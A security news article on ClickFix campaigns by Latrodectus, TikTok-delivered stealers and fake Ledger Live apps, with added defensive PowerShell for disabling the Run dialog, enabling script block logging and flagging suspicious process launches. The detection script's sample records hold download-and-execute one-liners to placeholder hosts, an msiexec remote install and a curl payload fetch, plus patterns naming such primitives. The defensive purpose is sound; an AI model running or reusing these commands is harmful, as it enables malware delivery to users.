Cybercriminals are stepping up their use of ClickFix, a social engineering technique in which victims are talked into running attacker-supplied commands themselves, and it continues to slip past traditional security controls. The latest threat actor to adopt the method is the group behind Latrodectus, a malware strain believed to be the successor to IcedID. First identified in April 2024, Latrodectus operates as a downloader for more damaging payloads such as ransomware.
In May 2025, researchers at Expel uncovered a fresh wave of Latrodectus attacks using ClickFix tactics. Victims are tricked into copying a PowerShell command from an infected website and pasting it into the Run dialog, where it runs without any script file being downloaded. Because this first stage exists only as pasted text executing in PowerShell's memory, browser download protections and file-scanning antivirus have nothing to inspect at the point of infection.
“These PowerShell commands download a malicious MSI file from a remote server using MSIExec, which sideloads a legitimate NVIDIA application to sneak in a malicious DLL,” said Expel. The DLL then uses curl to fetch and run the final payload, all without triggering typical detection systems.
Despite recent takedowns as part of Operation Endgame, a global law enforcement action that dismantled infrastructure supporting malware families including QakBot, TrickBot, and Bumblebee, Latrodectus remains active. The May 2025 phase of Operation Endgame shut down roughly 300 servers and 650 domains, yet the operators have clearly adapted quickly.
To raise the bar against ClickFix delivery, organizations are advised to disable the Windows Run dialog via Group Policy or to block the Windows + R hotkey with a Registry change, since the Run dialog is where victims are usually told to paste the command. Neither setting prevents a user from opening PowerShell or Windows Terminal from the Start menu and pasting the same text, so they add friction rather than close the hole, and they need to be paired with user awareness and endpoint logging of PowerShell activity.
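The following is an added example written for this article, not code from Expel, Microsoft or any vendor named here. It sets the two per-user policy values that back the mitigations just described and reads them back for auditing, then adds PowerShell Script Block Logging so that the in-memory stage still leaves a record. It assumes it runs as the user being hardened (the logging function needs an elevated session); the function names are mine.

```powershell
# Added example (not from the article or the vendors it cites). Explorer applies
# these per-user policy values at the next sign-in or explorer.exe restart.

$ExplorerPolicy = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'

function Set-RunDialogHardening {
    param(
        # NoRun = 1 is the registry value behind the Group Policy setting
        # "Remove Run menu from Start Menu"; it hides Run and blocks Win+R.
        [switch]$DisableRunDialog,
        # NoWinKeys = 1 is "Turn off Windows Key hotkeys". Caveat: it disables
        # every Win+<key> shortcut that Explorer handles, not only Win+R.
        [switch]$DisableWinKeyHotkeys
    )
    if (-not (Test-Path -Path $ExplorerPolicy)) {
        New-Item -Path $ExplorerPolicy -Force | Out-Null
    }
    if ($DisableRunDialog) {
        Set-ItemProperty -Path $ExplorerPolicy -Name 'NoRun' -Value 1 -Type DWord
    }
    if ($DisableWinKeyHotkeys) {
        Set-ItemProperty -Path $ExplorerPolicy -Name 'NoWinKeys' -Value 1 -Type DWord
    }
}

function Get-RunDialogHardening {
    # Returns the effective state as an object so an audit job can collect it.
    $p = Get-ItemProperty -Path $ExplorerPolicy -ErrorAction SilentlyContinue
    [pscustomobject]@{
        RunDialogDisabled = ($p.NoRun -eq 1)
        WinKeyHotkeysOff  = ($p.NoWinKeys -eq 1)
    }
}

# Neither value stops a user from opening PowerShell or Windows Terminal from the
# Start menu and pasting the same command, so the "in-memory" stage still has to
# be made visible. Script Block Logging writes the script text to event 4104 in
# Microsoft-Windows-PowerShell/Operational even when nothing touches disk.
# Machine-wide policy: requires an elevated session.
function Enable-ScriptBlockLogging {
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path -Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord
}

Set-RunDialogHardening -DisableRunDialog -DisableWinKeyHotkeys
Get-RunDialogHardening
```

In a managed estate the same values are normally delivered through Group Policy (User Configuration > Administrative Templates > Start Menu and Taskbar for the first two); the script is useful for unmanaged machines and for verifying that the policy actually landed.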
TikTok Joins the ClickFix Arsenal
As if malicious links weren’t enough, TikTok has now emerged as a new front in ClickFix malware attacks. A Trend Micro report details a campaign where fake tutorial videos instruct users to run dangerous PowerShell commands—under the guise of activating pirated software like Microsoft Office, Spotify, CapCut, and even Windows itself.
These TikTok videos, some garnering hundreds of thousands of views, feature verbal and visual instructions prompting users to open the Run dialog (Windows + R), launch PowerShell, and paste in attacker-supplied commands.
“Threat actors are now weaponizing AI-generated TikTok videos to guide users step-by-step into compromising their own systems,” said Trend Micro researcher Junestherry Dela Cruz. Once executed, the scripts install information-stealing malware like Vidar and StealC—without any file downloads that could alert antivirus tools.
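The chain described in this section and in the Latrodectus case above (explorer.exe starting PowerShell with a pasted download-and-execute one-liner, msiexec installing from a URL, curl launched from inside a sideloaded DLL) is what a defender would hunt for in process-creation telemetry. Below is an added example written for this article, not code from Trend Micro or Expel: a triage filter over records shaped like Sysmon event ID 1 (Image, ParentImage, CommandLine). The records are constructed sample data, and every URL, path and binary name in them is made up.

```powershell
# Added example, not from the article or its cited vendors. Sample records are
# constructed; real telemetry would come from Sysmon event ID 1 or Security 4688.

$SampleEvents = @(
    # TikTok-style: Win+R -> powershell -> pasted download-and-execute one-liner
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'powershell -w hidden -nop -c "iex (irm https://activate.example.invalid/office)"' }
    # Latrodectus-style: PowerShell hands an MSI URL to msiexec
    [pscustomobject]@{ Image = 'C:\Windows\System32\msiexec.exe'
                       ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'msiexec /i https://cdn.example.invalid/setup.msi /qn' }
    # Sideloaded DLL inside a vendor binary (constructed name) calls curl for the payload
    [pscustomobject]@{ Image = 'C:\Windows\System32\curl.exe'
                       ParentImage = 'C:\Users\Public\VendorApp\vendorapp.exe'
                       CommandLine = 'curl -s -o C:\Users\Public\stage2.bin https://cdn.example.invalid/s2' }
    # Benign: user opens PowerShell from the desktop with no arguments
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'powershell' }
    # Benign: a service job uses irm, but the parent is not the interactive shell
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Windows\System32\svchost.exe'
                       CommandLine = 'powershell -c "irm https://inventory.example.invalid/ping"' }
)

function Get-ImageLeaf {
    # Lower-cased file name from a full path (handles both slash styles).
    param([string]$Path)
    (($Path -split '[\\/]')[-1]).ToLowerInvariant()
}

function Find-ClickFixIndicators {
    param([Parameter(Mandatory, ValueFromPipeline)] [psobject]$Event)
    process {
        $image   = Get-ImageLeaf $Event.Image
        $parent  = Get-ImageLeaf $Event.ParentImage
        $cmd     = [string]$Event.CommandLine
        $reasons = [System.Collections.Generic.List[string]]::new()

        # 1. Interpreter started by the desktop shell (what Win+R -> PowerShell looks
        #    like) carrying a download-and-execute primitive or evasion switches.
        if (($image -in 'powershell.exe', 'pwsh.exe') -and $parent -eq 'explorer.exe') {
            if ($cmd -match '(?i)\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|frombase64string)\b') {
                $reasons.Add('explorer-spawned PowerShell with download/execute primitive')
            }
            if ($cmd -match '(?i)(-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-e(xecutionpolicy|p)\s+bypass|-enc(odedcommand)?\b)') {
                $reasons.Add('hidden-window / no-profile / encoded switches')
            }
        }
        # 2. msiexec told to install straight from a URL, as in the Latrodectus chain.
        if ($image -eq 'msiexec.exe' -and $cmd -match '(?i)/(i|package)\s+"?https?://') {
            $reasons.Add('msiexec install from remote URL')
        }
        # 3. curl.exe started by something other than an interactive shell. Updaters
        #    do this legitimately, so treat it as a lead to allow-list, not a verdict.
        $shells = 'cmd.exe', 'powershell.exe', 'pwsh.exe', 'explorer.exe', 'windowsterminal.exe'
        if ($image -eq 'curl.exe' -and $parent -notin $shells) {
            $reasons.Add("curl spawned by $parent")
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Image       = $image
                Parent      = $parent
                Reasons     = ($reasons -join '; ')
                CommandLine = $cmd
            }
        }
    }
}

$SampleEvents | Find-ClickFixIndicators | Format-List
```

Run against the constructed records, the first three are reported and the two benign ones are not: rule 1 is deliberately scoped to explorer.exe as the parent, because a user pasting into Run is the distinguishing feature of ClickFix, while scheduled or service-launched PowerShell that fetches URLs is common and would drown the signal.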
While the TikTok accounts used in the campaign (including @gitallowed, @zane.houghton, and @alexfixpc) have since been taken down, the threat persists. Experts warn that as social media evolves, attackers will continue to exploit popular platforms to deliver malware through trusted, user-generated content.
macOS Under Fire with Fake Ledger Live Apps
This kind of social engineering isn't limited to Windows, although the macOS campaign relies on a trojanized installer rather than a pasted command. Mac users are being targeted through fake Ledger Live apps designed to steal cryptocurrency wallet seed phrases. Four active malware campaigns, ongoing since August 2024, use trojanized DMG installers and AppleScript to exfiltrate the stolen data.
Once the fake app is launched, users are told their account requires “recovery,” prompting them to enter their seed phrase. This data is sent directly to attacker-controlled servers. Cybersecurity researchers at Moonlock Lab and Jamf confirmed that the campaign uses macOS malware like AMOS (Atomic macOS Stealer) and Odyssey, which began implementing the phishing scheme in March 2025.
Some of the attacks also rely on PyInstaller-packed binaries, creating persistent threats for Ledger users. According to MacPaw’s Moonlock Lab, activity around anti-Ledger scams is growing rapidly across dark web forums, and more sophisticated waves are expected soon. “Hackers will continue to exploit the trust crypto holders place in apps like Ledger Live,” said the Moonlock team.
As ClickFix malware attacks evolve across platforms and delivery channels—from websites to TikTok and even crypto apps—users and organizations alike must stay vigilant. Disabling risky features, educating users about social engineering, and using advanced endpoint protection are more critical than ever in this changing threat landscape.